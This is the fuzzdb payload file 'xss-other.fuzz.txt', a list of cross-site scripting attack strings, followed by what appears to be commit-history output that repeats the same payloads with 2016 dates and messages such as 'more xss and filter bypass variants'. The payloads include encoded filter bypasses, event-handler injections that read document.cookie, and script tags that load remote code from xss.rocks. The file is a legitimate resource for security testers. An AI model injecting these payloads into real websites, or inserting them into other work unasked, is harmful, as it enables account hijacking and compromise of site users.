fuzzdb/attack/xss/xss-other.fuzz.txt

<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;
javascript:alert(1)
alert(1)
alert
&#x61;l&#x65;rt&#40;1)
alert&lpar;1&rpar;
alert`1`
alert\\`1\\`
&lt;IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG SRC="jav&amp;#x0D;ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;
&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&amp;#x09;ascript:alert('XSS');">
<IMG SRC="jav&amp;#x0A;ascript:alert('XSS');">
<IMG SRC=java%00script:alert(\"XSS\")>
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT\s" != "<SCRIPT/XSS\s
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http:&#47;&#47;xss.rocks/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
&lt;SCRIPT SRC=//xss.rocks/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://xss.rocks/scriptlet.html <
\";alert('XSS');//
<SCRIPT SRC="http:&#47;&#47;xss.rocks/xss.jpg"></SCRIPT>
javascript:alert%28/xss/%29
Update xss-other.fuzz.txt 2016-03-08 00:37:10 +00:00			`<~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>`
			`http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe`
			`https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe`
			`&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi`
			`&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>`
			`PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`
			`<img src=x:x onerror=alert(1)>`
			`javascript:alert(1)`
			`alert(1)`
			`alert`
			`alert(1)`
			`alert(1)`
			alert`1`
			alert\\`1\\`
more xss and filter bypass variants 2016-03-08 00:58:15 +00:00			`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`
			`<a onmouseover="alert(document.cookie)">xxs link</a>`
			`<a onmouseover=alert(document.cookie)>xxs link</a>`
			`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`
			`<IMG SRC= onmouseover="alert('xxs')">`
			`<IMG onmouseover="alert('xxs')">`
			`<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">`
			`<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;`
			`&#39;&#88;&#83;&#83;&#39;&#41;>`
			`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`
			`<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>`
			`<IMG SRC="jav ascript:alert('XSS');">`
			`<IMG SRC="jav&#x09;ascript:alert('XSS');">`
			`<IMG SRC="jav&#x0A;ascript:alert('XSS');">`
			`<IMG SRC=java%00script:alert(\"XSS\")>`
			`<IMG SRC=" javascript:alert('XSS');">`
			`<SCRIPT\s" != "<SCRIPT/XSS\s`
			`';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`
			<BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert("XSS")>
			`<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>`
			`<<SCRIPT>alert("XSS");//<</SCRIPT>`
			`<SCRIPT SRC=http://xss.rocks/xss.js?< B >`
			`<SCRIPT SRC=//xss.rocks/.j>`
			`<IMG SRC="javascript:alert('XSS')"`
			`<iframe src=http://xss.rocks/scriptlet.html <`
			`\";alert('XSS');//`
			`<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>`
Update xss-other.fuzz.txt 2016-03-08 05:50:55 +00:00			`javascript:alert%28/xss/%29`